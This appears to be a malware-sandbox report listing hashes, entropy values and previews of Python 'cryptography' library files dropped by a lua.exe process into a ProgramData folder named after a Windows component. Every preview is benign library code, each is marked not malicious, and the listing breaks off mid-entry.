C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1201
Entropy (8bit):	4.723999316363918
Encrypted:	false
SSDEEP:	24:q9O0opQ2WkGk3HOE19RKXQb8S7U4rFNxA+CiVVb/XGPrrfJm+:IDoW2LuErAwU4rVlCiPDGL
MD5:	997E35D3E9C9ED9CA159B2E207FCD0E2
SHA1:	212FCC6DB2FB6CEE32840B7B36A1A73D8BDCF916
SHA-256:	C3695021C2AB16F4BD0FF124B7BA9679DDFD4D733A86E7A0EF6145ADFC08A39F
SHA-512:	A56CA07983322B0FA7D8BF3C0BE3E3A6B9E3ABEDA6A40E14CD5F44968A50ECC6C563D8BFBFD90E03082A87FACF03DFA0332E9A0C71B0E594839527E90CF30E52
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.hazmat._der import (. DERReader,. INTEGER,. SEQUENCE,. encode_der,. encode_der_integer,.).from cryptography.hazmat.primitives import hashes...def decode_dss_signature(signature):. with DERReader(signature).read_single_element(SEQUENCE) as seq:. r = seq.read_element(INTEGER).as_integer(). s = seq.read_element(INTEGER).as_integer(). return r, s...def encode_dss_signature(r, s):. return encode_der(. SEQUENCE,. encode_der(INTEGER, encode_der_integer(r)),. encode_der(INTEGER, encode_der_integer(s)),. )...class Prehashed(object):. def __init__(self, algorithm):. if not isinstance(algorithm, hashes.HashAlgorithm):. r

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\x25519.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2277
Entropy (8bit):	4.756861971269525
Encrypted:	false
SSDEEP:	24:q9O0opQ24t6G6LiNrgor6EvlN0uKRGNnkH4Egor6EvlNSSLgor6EvlN0uKkJNnc6:IDoWBeSkaLz0FRKPRaLzSbaLz0FSc9lC
MD5:	2061325198F3324D88DE0CA164AA6F07
SHA1:	9E7633F715E244E2BDEF1C78A0EF1146137DADBD
SHA-256:	BEB3758DC3BAB236D0ADCEDAB8895FD9A12F707DCFD7B70A52E6955F1693BF12
SHA-512:	F36C09B5A566FEA1CAA62E57492592FA6EADCD1A6958FEB118AFB18259F80EA608EC5E8839500649777D0E495AA4CF095B5EF656EA6046BA9562C99011C4610E
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography.exceptions import UnsupportedAlgorithm, _Reasons...@six.add_metaclass(abc.ABCMeta).class X25519PublicKey(object):. @classmethod. def from_public_bytes(cls, data):. from cryptography.hazmat.backends.openssl.backend import backend.. if not backend.x25519_supported():. raise UnsupportedAlgorithm(. "X25519 is not supported by this version of OpenSSL.",. _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM,. ).. return backend.x25519_load_public_bytes(data).. @abc.abstractmethod. def public_bytes(self, encoding, format):. """. The serialized bytes of the public key.. """...@six.add_metaclass(abc.ABCMeta).class X2551

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\x448.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2255
Entropy (8bit):	4.716407242990318
Encrypted:	false
SSDEEP:	24:q9O0opQ24t6G6orgoMEvnNQGNnk54EgoMEvnNNLgoMEvnNxJNncmB0NlF0+C:IDoWBNkS1QKtRS1KS15c9lC
MD5:	547432C32FB43A332474A5DC8A12360C
SHA1:	900D16A08547D5ADEEAF4534AD06D267A61D0B0E
SHA-256:	BB7BFE2F5209206D91C8B55387B14C91787F63EA156F71DD123E5BD5CF8994A9
SHA-512:	DC060DA2FD8690CFF2D10AFCA3B8527296B595F2ED3ECA9BB328E3CB8EC333BDFD08FFD21CE558B321A34C681E9A6DF2B331B0B8E7CDD298EC4DEA8E77E93B6D
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography.exceptions import UnsupportedAlgorithm, _Reasons...@six.add_metaclass(abc.ABCMeta).class X448PublicKey(object):. @classmethod. def from_public_bytes(cls, data):. from cryptography.hazmat.backends.openssl.backend import backend.. if not backend.x448_supported():. raise UnsupportedAlgorithm(. "X448 is not supported by this version of OpenSSL.",. _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM,. ).. return backend.x448_load_public_bytes(data).. @abc.abstractmethod. def public_bytes(self, encoding, format):. """. The serialized bytes of the public key.. """...@six.add_metaclass(abc.ABCMeta).class X448PrivateKe

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\ciphers\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	647
Entropy (8bit):	4.686217838307174
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17yDjCy5oNM16f9BRsBbm/PvIv0YRrOrN5M/5SZUZKZbmXv:q9O0opQ2+UwbL455yA4v
MD5:	93A2CE50F22BBF8E0422202E71451AB2
SHA1:	84DF052DEACC7EFDB6859373657E63142CCF0850
SHA-256:	9A2E32477171738F80BB7C97E0FCA114D6A2167D32CB064A893CDE71D23BEC42
SHA-512:	572F0CDAB8FE56C7DF89DB984E66107F335FE7DF69FBC1A886BB58E8921B6DEE206EC015A0432BC08580883A9D42935CC0ADFD5BA1DB2031475767682CD10A55
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography.hazmat.primitives.ciphers.base import (. AEADCipherContext,. AEADDecryptionContext,. AEADEncryptionContext,. BlockCipherAlgorithm,. Cipher,. CipherAlgorithm,. CipherContext,.)...__all__ = [. "Cipher",. "CipherAlgorithm",. "BlockCipherAlgorithm",. "CipherContext",. "AEADCipherContext",. "AEADDecryptionContext",. "AEADEncryptionContext",.].

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\ciphers\aead.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6134
Entropy (8bit):	4.591679826551009
Encrypted:	false
SSDEEP:	48:IDoWbhhHJgSEyPb/MyHO70tlO+7My8b6GWyXb9m6CSCuCtmbuMyHO70tlk8eUMyW:F48iclL9mDw54WhoTVE5lB
MD5:	31872D265C314CB60C15988A16FF7EAF
SHA1:	7649F8ABB781D8DD9C9198233E0318D243A21EBC
SHA-256:	9578193B195BC6D069D64ECA9A5AA088DFD7BBAC8FB0913F0CD24BC2C826D28D
SHA-512:	42B70930FB4470C949F508150A7CDA6F596CBE7DEA015E43A664ED086776C1188D085577DCFFE8DEB4B008C24E4D7CC7C4B98C67B4C2196986CDCE88FE2B2E9F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import os..from cryptography import exceptions, utils.from cryptography.hazmat.backends.openssl import aead.from cryptography.hazmat.backends.openssl.backend import backend...class ChaCha20Poly1305(object):. _MAX_SIZE = 2 ** 32.. def __init__(self, key):. if not backend.aead_cipher_supported(self):. raise exceptions.UnsupportedAlgorithm(. "ChaCha20Poly1305 is not supported by this version of OpenSSL",. exceptions._Reasons.UNSUPPORTED_CIPHER,. ). utils._check_byteslike("key", key).. if len(key) != 32:. raise ValueError("ChaCha20Poly1305 key must be 32 bytes.").. self._key = key.. @classmethod. def generate_key(cls):. return os.urandom(3

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\ciphers\algorithms.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4225
Entropy (8bit):	4.799521086365984
Encrypted:	false
SSDEEP:	96:FZewZMxjq2efbKujT4eWqbKuj3CesjGiKuj1DeNbKujNsae/bKu/0e+qbKuSOeO6:FZewZMxjqLzKujTphKuj3ntiKuj1KpKW
MD5:	4BE8B97EF14AEC5B5CB4666A942CD9D4
SHA1:	192FCFA408DA4DC339C4A859D96F94700FA4BE50
SHA-256:	18A14886F3A8AAC62C7238CFEE89E5F179C098E6BE91243A8E230C4B6CDE1813
SHA-512:	2CF9BA6B4BCF3E5D3E7170A6E004D446E45DF889F51D156BB3A83D1860BD420EFD9D8E337F38119401E9A82CF39A60BCC62AC6A36520D1C3B4B0EC4BED2A1324
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.hazmat.primitives.ciphers import (. BlockCipherAlgorithm,. CipherAlgorithm,.).from cryptography.hazmat.primitives.ciphers.modes import ModeWithNonce...def _verify_key_size(algorithm, key):. # Verify that the key is instance of bytes. utils._check_byteslike("key", key).. # Verify that the key size matches the expected key size. if len(key) * 8 not in algorithm.key_sizes:. raise ValueError(. "Invalid key size ({}) for {}.".format(. len(key) * 8, algorithm.name. ). ). return key...@utils.register_interface(BlockCipherAlgorithm).@utils.register_interface(CipherAlgorithm).class AES(object):. name = "AES". block_size = 128.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\ciphers\base.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7253
Entropy (8bit):	4.541685359594128
Encrypted:	false
SSDEEP:	192:F95iQdguvZmaqU/CX0XFX++R8fXpXq9rXw9DXT/gQ:FGmRbqUCd
MD5:	F02E35B722816E9AD74F5FEC3B5F8854
SHA1:	611196BE10453AD5C81385D4EA1664CA5312FEBF
SHA-256:	BDC78DE65EF2C4B5A6353A6D9730B78267C563E2BF00D2A4E0774D9763EDCF69
SHA-512:	9663952457BCA8DF768F1F4370006D9DDBD5D495140629963965B00A4EEB8988AAC2DB7EB842CAE1FEF83CCD0FBA74B8F4BA1C0AF67D6C5DB67069A823DA8A3E
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. AlreadyUpdated,. NotYetFinalized,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import CipherBackend.from cryptography.hazmat.primitives.ciphers import modes...@six.add_metaclass(abc.ABCMeta).class CipherAlgorithm(object):. @abc.abstractproperty. def name(self):. """. A string naming this mode (e.g. "AES", "Camellia").. """.. @abc.abstractproperty. def key_size(self):. """. The size of the key being used as an integer in bits (e.g. 128, 256).. """...@six.add_metaclass(abc.ABCMe

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\ciphers\modes.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6805
Entropy (8bit):	4.711527940876376
Encrypted:	false
SSDEEP:	192:F9miQvLGv1080BvS15vWLvAtvM+VBLAvYR8TO:FQ7m0jEOUq+t8TO
MD5:	A2B3825B7DDEFB68F5884746D2AB4AC7
SHA1:	2BDCAF66E36943D43AE5A535B6E2C6B6C5218CCE
SHA-256:	FB4553B4737790A3BF27273F88B020A7C6EAB6C5C963957617FFC192BEA7BED3
SHA-512:	636F48A3563EFFB4E1EC486EF83C9EFC709A6544E94506A676CADB3FFB64691927D6266D66DF1840D86EB9131ECAA716F54CAD30BA8E470035B78211D0CC08EC
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography import utils...@six.add_metaclass(abc.ABCMeta).class Mode(object):. @abc.abstractproperty. def name(self):. """. A string naming this mode (e.g. "ECB", "CBC").. """.. @abc.abstractmethod. def validate_for_algorithm(self, algorithm):. """. Checks that all the necessary invariants of this (mode, algorithm). combination are met.. """...@six.add_metaclass(abc.ABCMeta).class ModeWithInitializationVector(object):. @abc.abstractproperty. def initialization_vector(self):. """. The value of the initialization vector for this mode as bytes.. """...@six.add_metaclass(abc.ABCMeta).class ModeWithTweak(object):. @abc.abstractp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\cmac.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	4.604530795915291
Encrypted:	false
SSDEEP:	48:IDoW25Q5t5XkC+gejCiFDGSn7XLcX/dwKcZhXmmXWdG:FZ5o5X47XLcX1wPPX3XWdG
MD5:	FF8CC5C4656E66EC1A5DF598C0B0D4C3
SHA1:	226BC2545CB003E4408C7DB7098AC49D2DB31D4A
SHA-256:	789A72B0315B73B5BA3A2A65CD6296ACBE28C32DF40AAE8DB1AA3C9B36A9A9B1
SHA-512:	AB234DCC7E04ADD17284C495B43CCD80025BAA71F3C82A7027112596CA102B1BA2066655B8075C7B473420A7816FE8DDD820BE7089F747350D8E04A1C3007E90
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import CMACBackend.from cryptography.hazmat.primitives import ciphers...class CMAC(object):. def __init__(self, algorithm, backend=None, ctx=None):. backend = _get_backend(backend). if not isinstance(backend, CMACBackend):. raise UnsupportedAlgorithm(. "Backend object does not implement CMACBackend.",. _Reasons.BACKEND_MISSING_INTERFACE,. ).. if not isinstance(algorithm, ciphers.BlockCipherAlgorithm):. raise TypeError("Expected in

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\constant_time.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	430
Entropy (8bit):	4.594760268039916
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17yDjCy5JJHJue1C/C+CRmVblWli:q9O0opQ2qJuyC/C+zVblWli
MD5:	63FE80B2DADEFE9E26B5FCFB06512199
SHA1:	81465D1C60C8EF8CEEBEE6089CC5F1A47589CF65
SHA-256:	FF1E26AC75BEF6285F818F3D0708404C5888B86DBFD65F873240B198E524C9D3
SHA-512:	BD27091C5D7409BC8826845D4FC60ABCB1B83EFC6B995D7056F5EDDE8B04C4D6F26D2B0DDEEDF6D47C7C2196C6B25065A3E7FF7C6A83D533903000DD452DBC1B
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import hmac...def bytes_eq(a, b):. if not isinstance(a, bytes) or not isinstance(b, bytes):. raise TypeError("a and b must be bytes.").. return hmac.compare_digest(a, b).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\hashes.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6315
Entropy (8bit):	4.7784033643228545
Encrypted:	false
SSDEEP:	192:F95DY+JXUXJX+O/Ku/5t/TKTNp1ve8F/7K/V2/61/LTLYTfkaq940b:FXmPT+5HmySEw7gL6db
MD5:	3BF508E993B71D93EA2EA963F5552058
SHA1:	8E78305E57008E42468A9EDDA5B0B895609167A6
SHA-256:	7732F541C1058F8784973733A3C426B8E7A8A19F7A105C01CB773EE9CA5EC34C
SHA-512:	E1AFF572D8BC741CD33F72F3F6744DDB8FA604589670A53588544712DBCBF508660C9C7AD0F75E73566819CEB60D29B633DAAD9633640A24655182461F67AA8D
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HashBackend...@six.add_metaclass(abc.ABCMeta).class HashAlgorithm(object):. @abc.abstractproperty. def name(self):. """. A string naming this algorithm (e.g. "sha256", "md5").. """.. @abc.abstractproperty. def digest_size(self):. """. The size of the resulting digest in bytes.. """...@six.add_metaclass(abc.ABCMeta).class HashContext(object):. @abc.abstractproperty. def algorithm(self):. """. A HashAlgorithm that

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\hmac.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2306
Entropy (8bit):	4.590148749491882
Encrypted:	false
SSDEEP:	48:IDoW25Q5gOUkC+HeGCiPDGGRJXu5XidnX/dwKcZhXmA:FZ5pOU8DXu5XidnX1wPPXf
MD5:	D8D673FE1B6FEFE4E66CB51F394D7124
SHA1:	06AC4348037CDED08491DA59202745EDF48CA9A7
SHA-256:	018CD340C0E2AEE2A664A28B47A71E5635F9C90DE6A5C896231FFFB6934BCABE
SHA-512:	B44584BEACF4266CC81E425BED1088001B5E8E8E207D30CCBFDC628CF18C00E6716CB2AFCA5EF9B6BEFC2194F791466BA52D74DA40E0F18D8087FC052D48CCEF
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HMACBackend.from cryptography.hazmat.primitives import hashes...@utils.register_interface(hashes.HashContext).class HMAC(object):. def __init__(self, key, algorithm, backend=None, ctx=None):. backend = _get_backend(backend). if not isinstance(backend, HMACBackend):. raise UnsupportedAlgorithm(. "Backend object does not implement HMACBackend.",. _Reasons.BACKEND_MISSING_INTERFACE,. ).. if not isinstance(algorithm, hashes.HashAlgorithm)

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\kdf\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	771
Entropy (8bit):	4.535547887700402
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17yDjCy5Jpt8cGuuST5NXdlDro062rUqwWmDEE8HMB5z:q9O0opQ24tTuS17d+2ruIDHMB5
MD5:	384D290A58C1024ED6A0C2784A164EF9
SHA1:	32F35983D2DD9599BC6CCA225FEE44DD76286552
SHA-256:	9E87791E33ECC2366BF30169E93B2EE9E9FD6E51D8177921817239474CC87273
SHA-512:	ECF1951C1EBAB09CB03B858B1878E151DD891BB7159467465E31CBAE9970878763014D200664F3D7122E342F400DB1DCB6CACED68AB3DBF93D7BF8FAFF30B302
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six...@six.add_metaclass(abc.ABCMeta).class KeyDerivationFunction(object):. @abc.abstractmethod. def derive(self, key_material):. """. Deterministically generates and returns a new key based on the existing. key material.. """.. @abc.abstractmethod. def verify(self, key_material, expected_key):. """. Checks whether the key generated by the key material matches the. expected derived key. Raises an exception if they do not match.. """.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\kdf\concatkdf.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4095
Entropy (8bit):	4.644635264753485
Encrypted:	false
SSDEEP:	48:IDoWW5E5JS9PKa7JUQ1iBHQw7LE2LM9t2UX6C+Qefw/l2NKn2Ldpt2UXgC+Heowk:FH5V9l3ABFLE994UUyl3wp4U4cls
MD5:	53C5F1E745C61594E2266E1693C4AFEF
SHA1:	BCDB294BED3D050A5F49F270509271035D1C1D02
SHA-256:	816FB1014EAC3C4E9A66183F1BDB9C6796FFB9CB526CF71F4A91F2CADED0F0C0
SHA-512:	059FD26BF9F50D37937D66AC68EEFAC9B16511F3523A63F4C931A176FB937C290E0D4BC90577C395742C84D16400DCB06E12F9C483731B763D8F2FF52B44C2A9
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import struct..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. InvalidKey,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HMACBackend.from cryptography.hazmat.backends.interfaces import HashBackend.from cryptography.hazmat.primitives import constant_time, hashes, hmac.from cryptography.hazmat.primitives.kdf import KeyDerivationFunction...def _int_to_u32be(n):. return struct.pack(">I", n)...def _common_args_checks(algorithm, length, otherinfo):. max_length = algorithm.digest_size * (2 ** 32 - 1). if length > max_length:. raise ValueError(. "Can not derive keys larger than

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\kdf\hkdf.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3598
Entropy (8bit):	4.657928434491192
Encrypted:	false
SSDEEP:	48:IDoWYg5E5WSA2LygqXkC+HeoxXpVe7Kn2LO9VXkC+HeaqtLpOsd0QKp:FG5FNxXUtpkQNVXW00Z
MD5:	9BA59CAA0E97B7EC2C35D83D4AA0BE2B
SHA1:	AE464D03519C54B700B70E4910A2772F92E85730
SHA-256:	489250CDE43D387D2DDED51D52AD864FA2105EFF683CB0E3BA54FBC272D390C8
SHA-512:	E148E7E20A0E7711BD12594B3C503421DA56C08F7ABEBDAD8059E352012AE48C4648D70BD60ABEFA4032F5AB8D733754D34F96DE0D13008D6E082827130FFBB5
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import six..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. InvalidKey,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HMACBackend.from cryptography.hazmat.primitives import constant_time, hmac.from cryptography.hazmat.primitives.kdf import KeyDerivationFunction...@utils.register_interface(KeyDerivationFunction).class HKDF(object):. def __init__(self, algorithm, length, salt, info, backend=None):. backend = _get_backend(backend). if not isinstance(backend, HMACBackend):. raise UnsupportedAlgorithm(. "Backend object does not implement HMACBackend.",.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\kdf\kbkdf.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5100
Entropy (8bit):	4.51262999617363
Encrypted:	false
SSDEEP:	48:IDoWPJ5E5WShpwhi2LCWsC+HeGCiGGK34/xKC7EJC+fgvAJZrlaClI22LC8Gwb3Y:Fa5utFEpFObpI72Gd
MD5:	2BBDBA3985FF2D3D7019DD6CE79C9CB4
SHA1:	99F1AFFFEDCC6AC0E9A3A88FC52CDF9391533181
SHA-256:	6B07FBCDEB2C4FE6A6A24A765417725BC4D6AC39E64D71B31C75F8B1C04EF547
SHA-512:	BC736E1CFA94C1F5EEE6D645D5582E50996CBA5CC74B847E2C2810B1CFBB8F5B6997429F2936EC23650B55BEB5C4E5B9EE1F54CF58B66A4E24C36C727DD22C05
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from enum import Enum..from six.moves import range..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. InvalidKey,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HMACBackend.from cryptography.hazmat.primitives import constant_time, hashes, hmac.from cryptography.hazmat.primitives.kdf import KeyDerivationFunction...class Mode(Enum):. CounterMode = "ctr"...class CounterLocation(Enum):. BeforeFixed = "before_fixed". AfterFixed = "after_fixed"...@utils.register_interface(KeyDerivationFunction).class KBKDFHMAC(object):. def __init__(. self,. algorithm,. mode,. length

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\kdf\pbkdf2.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.640655115285636
Encrypted:	false
SSDEEP:	48:IDoW25E58SA2LhdvkC+Oed/p4/8n+W02zLGwyjQszg:FZ53udvvW02zNyjQv
MD5:	85B451BD0A2CB4CED553340B87604A80
SHA1:	3DC751E49916F1CDCF18F4C87B2010E405DFFFFC
SHA-256:	4587B12251A89B350453EFD04174D6F35ADD639615641DF45EB7E726AF0DB085
SHA-512:	09EBAD8FCEB2AFC705472E7C93DD249676610840028DA6209FD27E84B59F4AD5942DAF0496AFDF5FF592ACA8C1B7389237924B8297ACEF8B0F6B09EFA2D4D6EE
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. InvalidKey,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import PBKDF2HMACBackend.from cryptography.hazmat.primitives import constant_time.from cryptography.hazmat.primitives.kdf import KeyDerivationFunction...@utils.register_interface(KeyDerivationFunction).class PBKDF2HMAC(object):. def __init__(self, algorithm, length, salt, iterations, backend=None):. backend = _get_backend(backend). if not isinstance(backend, PBKDF2HMACBackend):. raise UnsupportedAlgorithm(. "Backend object does not implement PBKDF2HMACBacken

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\kdf\scrypt.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	4.646117986217263
Encrypted:	false
SSDEEP:	48:IDoWIn5E51xSPW2LamkC+TzeAdk+MhGzlGwyMANrzg:Fhn5i1Vm8hdVXzfyMd
MD5:	34A14ACC283893E2F13006CC1474FB04
SHA1:	394ECE0CD6C38EA01B86C7C6D8FEE2F64780A062
SHA-256:	0B40B79BE8049E52E5015C73445773C7599F0EE5ACFC19190E8495DA17DA85F9
SHA-512:	24E6A403184FE4D8B0046A1796F27350CA169C93B13FDC2F36AFB96CBE48F4CA001EBD584DC7655646DA1A6D2166EE86FFE4884576986BD518305DCCEBF11A36
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import sys..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. InvalidKey,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import ScryptBackend.from cryptography.hazmat.primitives import constant_time.from cryptography.hazmat.primitives.kdf import KeyDerivationFunction...# This is used by the scrypt tests to skip tests that require more memory.# than the MEM_LIMIT._MEM_LIMIT = sys.maxsize // 2...@utils.register_interface(KeyDerivationFunction).class Scrypt(object):. def __init__(self, salt, length, n, r, p, backend=None):. backend = _get_backend(backend). if not isinstance(backend, ScryptBack

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\kdf\x963kdf.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	4.630768306087133
Encrypted:	false
SSDEEP:	48:IDoWW5E52S9a2LurWh2JSvC+QefwKKlIAYjn4Kp:FH5+apWVdKU
MD5:	EC3A967A96F211B613C93400F78344B5
SHA1:	048B6DF06ECE8947432FE30D0F054E5361B8D81C
SHA-256:	DBAF9BFDC9325188AA6D633D999EC51166EEBD1EDE4CB92C21E590796D53274E
SHA-512:	E508487A52BAE0B363E1AC233E1615101FC0A2A1E5F1031F182E48AC55E9E67749746807C5C827FD058B02B254C6B57E6951D4B1FA9F986E7186B0F7740005EB
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import struct..from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. InvalidKey,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HashBackend.from cryptography.hazmat.primitives import constant_time, hashes.from cryptography.hazmat.primitives.kdf import KeyDerivationFunction...def _int_to_u32be(n):. return struct.pack(">I", n)...@utils.register_interface(KeyDerivationFunction).class X963KDF(object):. def __init__(self, algorithm, length, sharedinfo, backend=None):. backend = _get_backend(backend).. max_len = algorithm.digest_size * (2 ** 32 - 1). if length > max_len:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\keywrap.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
